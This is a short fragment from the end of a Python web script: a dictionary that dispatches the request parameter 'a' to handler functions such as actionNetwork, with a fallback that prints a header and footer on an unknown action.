  505.         'network' : actionNetwork
  506.     }[_REQUEST['a']]()
  507. except KeyError:
  508.     printHeader()
  509.     printFooter()
  510.  
